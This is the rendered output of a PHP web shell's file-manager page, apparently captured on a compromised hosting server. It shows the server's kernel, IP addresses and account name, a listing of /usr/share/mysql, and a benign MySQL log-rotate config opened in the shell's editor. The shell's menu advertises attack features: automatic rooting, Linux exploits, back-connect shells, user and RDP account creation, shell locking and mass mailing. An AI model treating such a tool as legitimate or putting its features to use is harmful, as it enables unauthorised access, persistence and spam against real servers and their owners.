Linux linux7.web4world.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
: 199.38.113.107 | : 216.73.216.118
Cant Read [ /etc/named.conf ]
?5.6.40
siddhapu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
mysql /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
bulgarian
[ DIR ]
drwxr-xr-x
?;
charsets
[ DIR ]
drwxr-xr-x
?;
czech
[ DIR ]
drwxr-xr-x
?;
danish
[ DIR ]
drwxr-xr-x
?;
dutch
[ DIR ]
drwxr-xr-x
?;
english
[ DIR ]
drwxr-xr-x
?;
estonian
[ DIR ]
drwxr-xr-x
?;
french
[ DIR ]
drwxr-xr-x
?;
german
[ DIR ]
drwxr-xr-x
?;
greek
[ DIR ]
drwxr-xr-x
?;
hungarian
[ DIR ]
drwxr-xr-x
?;
italian
[ DIR ]
drwxr-xr-x
?;
japanese
[ DIR ]
drwxr-xr-x
?;
korean
[ DIR ]
drwxr-xr-x
?;
norwegian
[ DIR ]
drwxr-xr-x
?;
norwegian-ny
[ DIR ]
drwxr-xr-x
?;
polish
[ DIR ]
drwxr-xr-x
?;
portuguese
[ DIR ]
drwxr-xr-x
?;
romanian
[ DIR ]
drwxr-xr-x
?;
russian
[ DIR ]
drwxr-xr-x
?;
serbian
[ DIR ]
drwxr-xr-x
?;
slovak
[ DIR ]
drwxr-xr-x
?;
spanish
[ DIR ]
drwxr-xr-x
?;
swedish
[ DIR ]
drwxr-xr-x
?;
ukrainian
[ DIR ]
drwxr-xr-x
dictionary.txt
24.98
KB
-rw-r--r--
errmsg-utf8.txt
518.77
KB
-rw-r--r--
fill_help_tables.sql
1.03
MB
-rw-r--r--
innodb_memcached_config.sql
3.91
KB
-rw-r--r--
install_rewriter.sql
2.17
KB
-rw-r--r--
magic
773
B
-rw-r--r--
mysql-log-rotate
844
B
-rw-r--r--
mysql_security_commands.sql
2.12
KB
-rw-r--r--
mysql_sys_schema.sql
281.58
KB
-rw-r--r--
mysql_system_tables.sql
151.8
KB
-rw-r--r--
mysql_system_tables_data.sql
1.19
KB
-rw-r--r--
mysql_test_data_timezone.sql
10.61
KB
-rw-r--r--
uninstall_rewriter.sql
1.21
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mysql-log-rotate
# The log file name and location can be set in # /etc/my.cnf by setting the "log-error" option # in either [mysqld] or [mysqld_safe] section as # follows: # # [mysqld] # log-error=/var/lib/mysql/mysqld.log # # In case the root user has a password, then you # have to create a /root/.my.cnf configuration file # with the following content: # # [mysqladmin] # password = <secret> # user= root # # where "<secret>" is the password. # # ATTENTION: The /root/.my.cnf file should be readable # _ONLY_ by root ! /var/lib/mysql/mysqld.log { # create 600 mysql mysql notifempty daily rotate 5 missingok compress postrotate # just if mysqld is really running if test -x /usr/bin/mysqladmin && \ /usr/bin/mysqladmin ping &>/dev/null then /usr/bin/mysqladmin flush-logs fi endscript }
Close